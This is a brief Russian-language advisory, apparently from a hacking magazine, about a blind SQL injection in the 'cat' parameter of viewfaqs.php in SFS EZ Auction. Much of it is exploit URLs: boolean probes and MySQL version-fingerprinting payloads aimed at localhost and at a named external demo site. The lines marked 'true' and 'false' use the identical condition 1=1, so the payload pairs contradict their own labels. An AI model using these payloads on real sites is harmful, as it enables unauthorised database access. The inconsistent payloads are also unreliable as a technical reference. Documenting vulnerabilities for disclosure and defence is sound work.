Хакер #305. Многошаговые SQL-инъекции
Программа: SFS EZ Auction
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cat» сценарием viewfaqs.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://localhost/viewfaqs.php?cat=1+and+1=1 true
http://localhost/viewfaqs.php?cat=1+and+1=1 false
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 true
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 false
http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
Демонстрация:
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
